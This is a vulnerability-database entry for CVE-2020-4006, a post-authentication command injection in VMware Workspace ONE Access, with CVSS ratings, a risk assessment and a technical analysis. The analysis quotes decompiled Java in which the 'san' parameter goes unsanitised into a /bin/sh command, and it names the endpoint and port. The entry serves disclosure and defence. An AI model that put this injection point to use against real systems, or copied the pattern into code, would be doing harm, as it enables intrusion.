Attacker Value
High
(2 users assessed)
Exploitability
Low
(2 users assessed)
User Interaction
None
Privileges Required
High
Attack Vector
Network
3

CVE-2020-4006

Disclosure Date: November 23, 2020
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector address have a command injection vulnerability.

Following speculation that CVE-2020-4006 might be related to the SolarWinds supply chain hack that led to the compromise of U.S. government agencies and global organizations, VMware said on December 22, 2020 that they have no indication they have any involvement on the nation-state attack on SolarWinds.

Add Assessment

6
Ratings
  • Attacker Value
    High
  • Exploitability
    Low
Technical Analysis

I’ve seen some news headlines with very scary-sounding words (“ransacking networks!”) on this, which is dismaying. It’s completely understandable that folks would be alarmed by a zero-day (now patched), but when we get into the details of this one a bit, I would tend to doubt that it’s going to be a good candidate for mass exploitation (note that I’m not telling anyone not to patch, just that headlines aren’t always reality!).

Even before getting into the weeds a little more, we can see from the CVSSv3 metrics that this requires high-privileged access and carries a 7.2 severity rating. I’ve watched researchers prove severity ratings wrong in the past, to be sure, but looking at the advisory, we can see that any attempt at exploitation would require an attacker to have access to the admin configurator on port 8443, plus admin credentials for the configurator account. If you have that level of access as an attacker, you can do all sorts of nefarious things with it, but those requirements don’t lend themselves to easy exploitation. It’s a good one to patch, but it also sounds like this is another case where strong password policies (especially for admin accounts!) would go a long way toward mitigating the risk of vulns both known and unknown. Ensuring that management interfaces are not exposed to the internet is another good move!

The NSA reported this vulnerability to VMware directly as a zero-day, which likely means they were seeing a specific threat actor deploy it in targeted intelligence operations. We haven’t seen any other reports of exploitation yet. From reading the docs, it looks like admins are required to change the password upon configuration, so the tried and true combo of admin:admin shouldn’t be possible.

2
Technical Analysis

Please read @ccondon-r7’s excellent assessment of CVE-2020-4006. The following is a technical analysis of the vulnerability.

I decided to revisit CVE-2020-4006 after it (and other vulnerabilities) received renewed attention for use in a nation-state actor’s TTPs. I also managed to obtain the software this time. I did not manage to obtain the patch, so the following analysis is a “best effort” attempt to deduce the vulnerability.

CVE-2020-4006 is a post-auth command injection in VMware Workspace ONE Access and multiple related products. The vulnerability appears to be in the /cfg/ssl/installSelfSignedCertificate endpoint within the “Appliance Configurator” service on HTTPS port 8443. By specifying a malicious san parameter in a POST request to the endpoint, arbitrary shell commands can be executed.

  @RequestMapping(method = {RequestMethod.POST}, value = {"/installSelfSignedCertificate"})
  @ResponseBody
  public AjaxResponse installSelfSignedCertificate(MultipartHttpServletRequest request) {
    try {
      log.debug("Generating and installing self-signed sslCertificate");
      this.workspacePreAuthFilter.storePasswordInSession((HttpServletRequest)request);
      this.applianceSslCertificateService.generateAndInstallSelfSignedCertificate(request);
    } catch (AdminPortalException e) {
      return new AjaxResponse(Messages.getMessage(e.getErrorId(), e.getArgs()), Integer.valueOf(2), false);
    }
    return new AjaxResponse(Messages.getMessage("configurator.configure.ssl.installingCertificate"), Integer.valueOf(0), true);
  }
  public void generateAndInstallSelfSignedCertificate(MultipartHttpServletRequest request) throws AdminPortalException {
    String generateSelfSignedCertCmd[], installSelfSignedCertificateCmd[], sanValue = request.getParameter("san");

    String vmName = this.configHelper.getApplianceFqdn();


    if (StringUtils.isAllEmpty(new CharSequence[] { sanValue })) {
      sanValue = vmName;
    } else if (!sanValue.contains(vmName)) {
      sanValue = sanValue + "," + vmName;
    }

    if (Const.isWindowsDeployment) {
      generateSelfSignedCertCmd = new String[] { "cmd", "/c", "\"\"" + SELF_SIGNED_CERTIFICATE_CMD + "\"" + " -host " + vmName + " -san " + "\"" + sanValue + "\"" + " -force" + "\"" };
    } else {
      generateSelfSignedCertCmd = new String[] { "/bin/sh", "-c", SELF_SIGNED_CERTIFICATE_CMD + " --makesslcert " + vmName + " " + vmName + " " + sanValue };
    }

    log.info("Executing command {}", Arrays.toString((Object[])generateSelfSignedCertCmd));

    try {
      CommandUtils.executeCommand(generateSelfSignedCertCmd);
      log.info("Command {} succeeded", Arrays.toString((Object[])generateSelfSignedCertCmd));
    } catch (IOException e) {
      log.error("Command {} failed: {}", Arrays.toString((Object[])generateSelfSignedCertCmd), e.getMessage());
      throw new AdminPortalException(null, "configurator.configure.ssl.errorGeneratingSelfSignedCertificate", null);
    }



    if (Const.isWindowsDeployment) {
      installSelfSignedCertificateCmd = new String[] { "cmd", "/c", "\"\"" + SELF_SIGNED_CERTIFICATE_CMD + "\"" + " -host " + vmName + " -install" + "\"" };
    } else {
      installSelfSignedCertificateCmd = new String[] { "/bin/sh", "-c", String.format("nohup %s > /usr/local/horizon/log/installSelfSignedCert.log &", new Object[] { SELF_SIGNED_CERTIFICATE_CMD }) };
    }

    log.info("Executing command {}", Arrays.toString((Object[])installSelfSignedCertificateCmd));
    try {
      CommandUtils.executeCommand(installSelfSignedCertificateCmd);
      log.info("Command {} succeeded", Arrays.toString((Object[])installSelfSignedCertificateCmd));
    } catch (IOException e) {
      log.error("Command {} failed: {}", Arrays.toString((Object[])installSelfSignedCertificateCmd), e.getMessage());
      throw new AdminPortalException(null, "configurator.configure.ssl.errorInstallingCertificate", null);
    }

    if (Const.isWindowsDeployment &&
      !this.tomcatUtils.restartApplianceService((HttpServletRequest)request)) {
      throw new AdminPortalException("configurator.configure.workspaceUrl.errorRestartingService", null);
    }
  }

Note that exploitation may restart the service. Activity is logged in the /opt/vmware/horizon/workspace/logs/configurator.log file.

CVSS V3 Severity and Metrics
Base Score:
9.1 Critical
Impact Score:
6
Exploitability Score:
2.3
Vector:
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
High
User Interaction (UI):
None
Scope (S):
Changed
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Products

  • VMware Workspace One Access (Access), VMware Workspace One Access Connector (Access Connector), VMware Identity Manager (vIDM), VMware Identity Manager Connector (vIDM Connector), VMware Cloud Foundation, vRealize Suite Lifecycle Manager

Exploited in the Wild

Reported by:

Additional Info

Technical Analysis